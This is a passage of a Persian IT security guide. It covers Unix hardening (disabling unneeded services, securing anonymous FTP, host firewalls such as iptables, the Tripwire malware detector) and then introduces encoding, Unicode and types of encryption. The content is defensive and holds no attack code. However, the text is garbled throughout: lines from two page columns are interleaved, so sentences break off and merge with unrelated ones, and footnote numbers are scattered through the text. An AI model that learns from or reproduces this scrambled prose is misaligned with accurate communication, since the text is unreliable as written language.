ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻪ ﺗﻮﺳﻂ ﺍﻳﻦ daemonﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ١٢٨ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ
ﮔﺮﻓﺘﻪﺍﻧﺪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ ﻻﺯﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ.
ﻧﺪﺍﺭﻳﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ .ﺧﺪﻣﺎﺕ ﺷـﺒﻜﻪﺍﻱ ﺩﻳﮕـﺮ ﻛـﻪ ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎ ﻳﻚ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ
ﻫﻨﮕﺎﻡ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺳﻴﺴﺘﻢ ﺷﺮﻭﻉ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻣـﻲﻛﻨﻨـﺪ ﺩﺭ ﻏﻴــﺮ ﺍﺯ ﺣــﺴﺎﺏ ﻛــﺎﺭﺑﺮﻱ ﺭﻳــﺸﻪ ﺍﺯ ﺧــﺪﻣﺎﺕ ﺷــﺒﻜﻪﺍﻱ
ﻓﺎﻳﻠﻬــﺎﻳﻲ ﺩﺭ ﻣــﺴﻴﺮ /etc/init.dﻳــﺎ /etc/rc*.dﻭ ﻳــﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
/etc/rcﻭ /etc/rc.localﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ .ﺑـﻪ ﺧـﺪﻣﺎﺗﻲ
ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺳﻴﺴﺘﻢ ﻳﺎ ﻛﺎﺭﺑﺮ ﺁﻧﺮﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻫﻴﭽﮕﺎﻩ ﺑﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ،ﻧﺮﻡﺍﻓﺰﺍﺭ ﺟﺪﻳﺪ ﺭﺍ ﺑﺎﺯ ﻭ
ﺩﻳﮕﺮﺍﻥ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ -ﻣﺜـﻞ - fingerdﺗﻮﺟـﻪ ﻭﻳـﮋﻩ ﻻ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺭ ﻣﺤﻴﻄﻲ ﻛـﻪ ﺑـﺎ ﻳﺎ ﻛﺎﻣﭙﺎﻳﻞ ﻧﻜﻨﻴﺪ .ﻣﻌﻤﻮ ﹰ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ. chrootﻭﺍﺭﺩ ﺁﻥ ﻣﻲﺷﻮﻳﺪ ﻛﺎﻣﭙﺎﻳﻞ ﻣﻲﺷﻮﻧﺪ ﺗﺎ ﺍﺯ ﺷـﻤﺎ
ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﺗﺮﻭﺍﻫﺎ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻨﺪ.
ﺍﮔﺮ ﺳﺮﻭﻳﺲ FTPﻧﺎﺷﻨﺎﺱ ١٢٩ﺭﺍ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻱ ﻧﻤـﻮﺩﻩ ﺍﻳـﺪ
ﺣﺘﻤــﹰﺎ ﺁﻧـــﺮﺍ ﺑـــﻪﺭﻭﺯﺭﺳـــﺎﻧﻲ ﻧﻤﺎﻳﻴـــﺪ .ﻫﺮﮔـــﺰ ﻓﺎﻳـــﻞ ﻧﺼﺐ ﺩﻳﺴﻜﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
/etc/passwdﺭﺍ ﺩﺭ ﻣﺤــﻴﻂ FTPﺗﺒــﺎﺩﻝ ﻧﻜﻨﻴــﺪ. ﻣﻲﮔﻴﺮﻧﺪ
ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴﺪ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ bin ،uucp ،rootﻭ
ﺩﻳﮕﺮ ﺣﺴﺎﺑﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺎﺭﺑﺮ ﺧﺎﺻﻲ ﻗﺮﺍﺭ ﻧﺪﺍﺭﻧـﺪ ﺍﮔﺮ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺩﻳـﺴﻚ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ
ﺩﺭ ﻓﺎﻳــﻞ - /etc/ftpusersﻛــﻪ ﺷــﺎﻣﻞ ﻓﻬﺮﺳــﺖ ﻣﺨﺘﻠﻒ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ )ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﺎﺭﺑﺮﺍﻧﻲ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ FTPﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ - ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ ﻳـﺎ ﺳﻴـﺴﺘﻤﻬﺎﻱ (UNIXﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ
ﻭﺟــﻮﺩ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ .ﻣﺮﺍﻗــﺐ ﻣﺠــﻮﺯ ﺩﺳﺘﺮﺳــﻲ ﺑــﻪ ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﻣﻨﺎﺳــﺒﻲ ﺗﻌﻴــﻴﻦ ﻭ ﺩﺭﺻــﻮﺭﺕ ﺍﻣﻜــﺎﻥ
ﺷﺎﺧﻪﻫﺎ ١٣٠ﻭ ﻣﺎﻟﻜﻴﺖ ١٣١ﺁﻧﻬﺎ ﺩﺭ ﻣﺤﻴﻂ FTPﺑﺎﺷﻴﺪ .ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴﺎﺯﻣﻨﺪﻧﺪ ﺭﺍ
ﺍﻧﺠﺎﻡ downloadﺗﻮﺳﻂ ﻣـﺴﻴﺮﻫﺎﻱ ﻭﺭﻭﺩﻱ ﻭ ﺍﻧﺠـﺎﻡ ﺗﻨﻬﺎ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﺓ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ.
ﺳﻴﺴﺘﻢ ﻭ ﺩﻳﮕﺮ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑﻄﻮﺭ ﻣﺨﻔﻴﺎﻧﻪ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ uploadﺑﻮﺳﻴﻠﻪ ﻣﺴﻴﺮﻫﺎﻱ ﺧﺮﻭﺟﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴـﺪ،
ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﺧﻴﺮ. ﻭ ﺑﺎﻻﺧﺮﻩ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺛﺒﺘﻬﺎﻱ ﺳـﺮﻭﻳﺲ FTPﺧـﻮﺩ ﺭﺍ
ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ
ﻫــﺮ ﺳﻴــﺴﺘﻢ UNIXﺑﺎﻳــﺪ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﻣﺒﺘﻨــﻲ ﺑــﺮ
١٣٣
ﻣﻴﺰﺑﺎﻥ ١٣٢ﻣﺨﺼﻮﺹ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺗـﺼﻔﻴﺔ ﺑـﺴﺘﻪﻫـﺎ
ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻧﻤﺎﻳﺪ .ﺍﺯ ﻣﺴﺘﻨﺪﺍﺕ ﻓﺮﻭﺷﻨﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺗـﺎ
ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﻛﻪ ﺁﻳﺎ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺍﺭﺍﻱ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ
ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ ،ﻭ ﺍﮔﺮ ﻫﺴﺖ ﭼﮕﻮﻧﻪ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ
ﻻ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ .ﻣﻌﻤﻮ ﹰ
ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﺷــﺎﻣﻞ ipchains ،ipfwﻭ iptables
ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜـﺮﺑﻨـﺪﻱ
ﺷﻮﻧﺪ ﻛﻪ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺭﺍﻩ ﻋﺒﻮﺭ ﺗﻤـﺎﻣﻲ ﺑـﺴﺘﻪﻫـﺎ ﺭﺍ
ﻣﺴﺪﻭﺩ ﻛﻨﻨﺪ ﻭ ﺗﻨﻬﺎ ﺑﻪ ﺁﻧﻬﺎﻳﻲ ﻣﺠـﻮﺯ ﻋﺒـﻮﺭ ﺩﻫﻨـﺪ ﻛـﻪ
ﻣﻘﺼﺪ ﺁﻧﻬﺎ ﺧﺪﻣﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﺧﻮﺍﺳﺘﻪﺍﻳﺪ.
ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻧﺪﻥ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺨـﺮﺏ
ﺑﻪ ﺭﺍﻫﺒﺮ Unixﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﻳﻜﻲ ﺍﺯ ﻗﺪﻳﻤﻲ ﺗـﺮﻳﻦ ﺁﻧﻬـﺎ
Tripwireﺍﺳﺖ ﻛﻪ ﺗﺤﻘﻴﻖ ﻣﻲﻛﻨﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻬـﻢ
ﺍﮔﺮ ﻣﻴﺎﻥ ﺍﺭﻗﺎﻡ ﻓﺎﺻﻠﻪ ﻗﺮﺍﺭ ﺩﻫﻴﻢ ﺧﻮﺍﻧﺎﺗﺮ ﻫﻢ ﻣﻲﺷﻮﺩ: ﻛﺪﮔﺬﺍﺭﻱ ﻗﺎﻟﺐ ﻣﻮﺿﻮﻉ ﺭﺍ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺮﺧﻲ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ
ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﺳﺎﺯﺩ .ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺑﺮﮔـﺸﺖ ﭘـﺬﻳﺮ ﺍﺳـﺖ؛
19 05 03 21 18 09 20 25 27 09 19 27 09 13 16 15 18 20 ١٣٦
01 14 20 28.
ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻗﺎﻟﺐ ﻛﺪﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﻌﺪﹰﺍ ﻣﻲﺗﻮﺍﻧـﺪ ﻛﺪﮔـﺸﺎﻳﻲ
ﺷﻮﺩ ﺗﺎ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ ﺗﺒﺪﻳﻞ ﮔﺮﺩﺩ.
ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﻴﺎﻡ ﺩﺭﻳﺎﻓﺖ ﺷﺪ ،ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺁﻧﺮﺍ ﺑﻪ ﺣﺎﻟﺖ ﺍﻭﻝ ﺑﺎﺯ
ﻣﻲﮔﺮﺩﺍﻧﺪ:
ﻓﺮﺁﻳﻨﺪ ﻛﺪﮔﺬﺍﺭﻱ
Sﺟﺎﻳﮕﺰﻳﻦ ۱۹ﻣﻲﺷﻮﺩ؛
ﻓﺮﺽ ﻛﻨﻴﺪ ﻣﻲ ﺧﻮﺍﻫﻴﺪ ﭘﻴﺎﻣﻲ ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ ﻳـﻚ
Eﺟﺎﻳﮕﺰﻳﻦ ۰۵ﻣﻲﺷﻮﺩ؛
ﺟﻤﻠﺔ ﻋﺎﺩﻱ ﺍﻧﮕﻠﻴﺴﻲ ﺍﺳﺖ:
Cﺟﺎﻳﮕﺰﻳﻦ ۰۳ﻣﻲﺷﻮﺩ ،ﻭ ﺍﻳﻨﻜﺎﺭ ﺁﻧﻘﺪﺭ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑﺪ ﺗﺎ ﺟﻤﻠـﺔ
ﺍﺻﻠﻲ ﺑﺪﺳﺖ ﺁﻳﺪ. Security is important.
ﺍﻣﺎ ﺩﺭ ﺍﺭﺳﺎﻝ ﻣﺤﺪﻭﺩﻳﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭ ﺁﻥ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺷـﻤﺎ
ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻛﺪﮔﺬﺍﺭﻱ
ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺭﻗﺎﻡ ﺩﻫﺪﻫﻲ ﺭﺍ ﺍﺭﺳﺎﻝ ﻛﻨﻴـﺪ،۵ ،۴ ،۳ ،۲ ،۱ ،۰ :
ﻛﺎﺭﺑﺮﺩ ﺍﺻﻠﻲ ﻛﺪﮔﺬﺍﺭﻱ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺑﻪ ﺁﻥ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ ﺩﺭ .۹ ،۸ ،۷ ،۶ﭘﺲ ﺑﺎﻳﺪ ﻳﻚ ﺗﺎﺑﻊ ﻧﮕﺎﺷﺖ ﺗﻬﻴﻪ ﻛﻨـﻴﻢ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ
ﺍﻧﺘﻘﺎﻝ ﺿﻤﺎﺋﻢ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ .ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺁﻧﭽﻪ ﻣﻲﺧﻮﺍﻫﻴﻢ ﺍﺭﺳﺎﻝ ﻛﻨﻴﻢ ﺭﺍ ﺑﻪ ﺍﻋﺪﺍﺩ ﺩﻫﺪﻫﻲ ﺗﺒﺪﻳﻞ ﻛﻨـﺪ،
ﺍﺑﺘﺪﺍ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻣﺘﻮﻥ ﺑﻪ ﺯﺑـﺎﻥ ﺍﻧﮕﻠﻴـﺴﻲ ﻃﺮﺍﺣـﻲ ﺷـﺪ ﻭ ﻭ ﺑﻌﺪ ﺍﺯ ﺍﺭﺳﺎﻝ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺁﻧـﺮﺍ ﻣﺠـﺪﺩﹰﺍ ﺑـﻪ ﺣﺎﻟـﺖ ﻗﺒﻠـﻲ ﺧـﻮﺩ
ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﻛﺪ ASCIIﺑﻮﺩ ﻛﻪ ۱۲۸ﺣﺮﻑ ﻣﻨﺤﺼﺮ ﺑﻪ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ.
ﻓﺮﺩ ﺩﺍﺷﺖ .ﺍﻳﻦ ﺗﻌـﺪﺍﺩ ﻛـﺪ ﺑـﺮﺍﻱ ﻧﻤـﺎﻳﺶ ۲۶ﺣـﺮﻑ ﺍﻟﻔﺒـﺎﻱ
ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺯ ﻳﻜﺴﺮﻱ ﻗﻮﺍﻧﻴﻦ ﺳﺎﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ:
ﺍﻧﮕﻠﻴــﺴﻲ ﺑــﻪ ﺷــﻜﻞ ﻛﻮﭼــﻚ ﻭ ﺑــﺰﺭﮒ ۱۰،ﺭﻗــﻢ ،ﺑﺮﺧــﻲ ﺍﺯ
ﻧﺸﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺎﻧﻨﺪ ﻭﻳﺮﮔﻮﻝ ،ﻧﻘﻄﻪ ،ﻛﺮﻭﺷﻪ ﻭ ﻧﻴﺰ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﻋﺪﺩ ۰۱ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛ ﺑﺠﺎﻱ A
ﻛﻠﻴﺪﻫﺎﻱ ﻛﻨﺘﺮﻟﻲ ﻣﺜﻞ Tabﻭ Endﺑﻜﺎﺭ ﻣﻲﺭﻓﺘﻨﺪ. ﻋﺪﺩ ۰۲ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛ ﺑﺠﺎﻱ B
ﻋﺪﺩ ۰۳ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛ ﺑﺠﺎﻱ C
ﺍﻣﺎ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﺑﺎﻧﻬﺎ ﺗﻌﺪﺍﺩ ﺣﺮﻭﻓﺸﺎﻥ ﺑﻴﺸﺘﺮ ﺍﺯ ﺯﺑـﺎﻥ ﺍﻧﮕﻠﻴـﺴﻲ
ﺍﺳﺖ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ،ﻓﺎﻳﻠﻬﺎﻱ ﭘﺮﺩﺍﺯﺵ ﻛﻠﻤﻪ ،ﻋﻜﺴﻬﺎ 134 Encoding
ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﻓﺎﻳﻠﻬـﺎ ﺍﺯ ﺑﺎﻳﺘﻬـﺎﻱ ۸ﺑﻴﺘـﻲ ﺗـﺸﻜﻴﻞ ﺷـﺪﻩﺍﻧـﺪ ﻭ 135 Encryption
136 Decoding
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٠٦
Unicodeﺑﺮﺍﻱ ﻫﺮﻳﻚ ﺍﺯ ﺣﺮﻭﻑ ،ﺷﻤﺎﺭﺓ ﻣﺠﺰﺍﻳﻲ ﺍﺧﺘﺼﺎﺹ ﻣﺠﻤﻮﻋﹰﺎ ۲۵۶ﺣﺮﻑ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺭﺍ ﻣﻲﺳـﺎﺯﻧﺪ ،ﻭ ﻫﻴﭽﻴـﻚ
ﻣﻲﺩﻫﺪ .ﺍﻫﻤﻴﺘﻲ ﻧﺪﺍﺭﺩ ﻛﻪ ﭼﻪ ﺑـﺴﺘﺮ ،ﺑﺮﻧﺎﻣـﻪ ﻳـﺎ ﺯﺑـﺎﻧﻲ ﻣـﻮﺭﺩ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳﻂ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺳﺎﻝ ﮔﺮﺩﻧﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ .ﺍﺳﺘﺎﻧﺪﺍﺭﺩ Unicodeﺑﺎ ﺭﻫﺒﺮﻱ ﺷﺮﻛﺘﻬﺎﻳﻲ ﭼﻮﻥ ﺑﺮﺍﻱ ﺣﻞ ﺍﻳﻦ ﻣﺸﻜﻞ ﻣﻔﻬﻮﻡ ﺿﻤﺎﺋﻢ ١٣٧ﺑﻮﺟﻮﺩ ﺁﻣﺪ ،ﻛـﻪ ﺩﺭ ﺁﻥ
،Microsoft ،JustSystem ،IBM ،HP ،Apple ﻓﺎﻳﻠﻲ ﻛـﻪ ﻫﻤـﺮﺍﻩ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺭﺳـﺎﻝ ﻣـﻲ ﺷـﻮﺩ ﺍﺑﺘـﺪﺍ
Unisys ،Sybase ،Sun ،SAP ،Oracleﻭ ...ﻧﻬـــــﺎﻳﻲ ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﮔﺮﺩﺩ ﺗﺎ ﻣﺤﺘﻮﺍﻱ ﺁﻥ ﺑﻪ ﺷﻜﻞ ﺣـﺮﻭﻑ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ
ﺷﺪﻩ ،ﻭ ﺩﺭ ﺗﻤﺎﻡ ﺑﺴﺘﺮﻫﺎ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺛﺎﺑﺖ ﺍﺳﺖ.
ASCIIﺩﺭ ﺁﻳﺪ .ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻣﺸﺎﺑﻪ ﻫﻤﺎﻥ ﻓﺮﺁﻳﻨـﺪﻱ ﺍﺳـﺖ ﻛـﻪ
ﻛﻪ ﻃﻲ ﺁﻥ ﺗﻮﺍﻧـﺴﺘﻴﻢ ﺁﻥ ﺟﻤﻠـﻪ ﺭﺍ ﺗﻨﻬـﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻋـﺪﺍﺩ
ﺭﻣﺰﮔﺬﺍﺭﻱ
ﻛﺪﮔ ـﺬﺍﺭﻱ ﻛﻨــﻴﻢ .ﻣــﺸﺎﺑﻪ ﻣﺜــﺎﻝ ﻗﺒﻠــﻲ ،ﺩﺭ ﺍﻳﻨﺠــﺎ ﻧﻴــﺰ ﭘﻴــﺎﻡ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻤﺎﻧﻨﺪ ﻛﺪﮔﺬﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺁﻥ ،ﻣﺘـﻮﻥ ﻳـﺎ ﻛﺪﮔﺬﺍﺭﻱﺷﺪﻩ ﺍﺯ ﺍﺻﻞ ﭘﻴﺎﻡ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺳﺖ؛ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ
ﻣﻮﺿﻮﻋﺎﺕ ﺑﻪ ﻗﺎﻟﺐ ﺩﻳﮕﺮﻱ ﺗﺒـﺪﻳﻞ ﻣـﻲﺷـﻮﻧﺪ .ﻫـﺪﻑ ﺍﻳﻨﻜـﺎﺭ ﺍﻳﺠﺎﺩ ﺍﺷﻜﺎﻝ ﺧﺎﺻﻲ ﺍﻧﺘﻘـﺎﻝ ﻳﺎﺑـﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺩﺭﻳﺎﻓـﺖ ﺷـﺪ
ﻣﺨﻔﻲ ﻛﺮﺩﻥ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺍﺳﺖ. ﻛﺪﮔﺸﺎﻳﻲ ﮔﺮﺩﺩ ﻭ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ ﺩﺭﺁﻳﺪ.
ﺳﻪ ﺭﻭﺵ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
Unicode
١٣٨
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ • Unicodeﻧﻮﻋﻲ ﺭﻭﺵ ﻛﺪﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺣﺮﻭﻓﻲ ﺍﺳـﺖ
١٣٩
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ • ﻛﻪ ﺩﺭ ﺯﺑﺎﻧﻬﺎﻱ ﺭﺍﻳﺞ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻭ ﺭﺍﻳﺎﻧـﻪﻫـﺎ
١٤٠
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﻄﺮﻓﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ Hash • ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﻳﻜﺴﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﻧﺪ .ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﻛـﻪ ﺩﺭ
ﻛﻨـــﺴﺮﺳﻴﻮﻡ (http://www.unicode.org) Unicodeﻣـــﻮﺭﺩ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ
ﺗﻮﺍﻓﻖ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺑﻪ ﺷﻜﻞ ﺧﻼﺻﻪ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ:
ﺑﻪ ﺯﺑﺎﻥ ﺳﺎﺩﻩ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻣﺸﺎﺑﻪ ﻛﺪﮔـﺬﺍﺭﻱ ﺍﺳـﺖ ﻛـﻪ
ﺍﺳﺎﺳﹰﺎ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎ ﺍﻋﺪﺍﺩ ﻭ ﺍﺭﻗﺎﻡ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ .ﺁﻧﻬﺎ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ
ﺣﺮﻭﻑ ﺍﺻﻠﻲ ﻣﺘﻦ ﻫﻤﮕﻲ ﺩﺭ ﺁﻥ ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮﻱ ﻣﻲﻳﺎﺑﻨﺪ .ﻳﻜـﻲ
ﻭ ﺩﻳﮕﺮ ﻋﻼﻣﺘﻬﺎ ﺭﺍ ﺑﺎ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻥ ﻳﻚ ﻋـﺪﺩ ﺑـﻪ ﻫﺮﻳـﻚ ﺍﺯ
ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫـﺮ ﺣـﺮﻑ
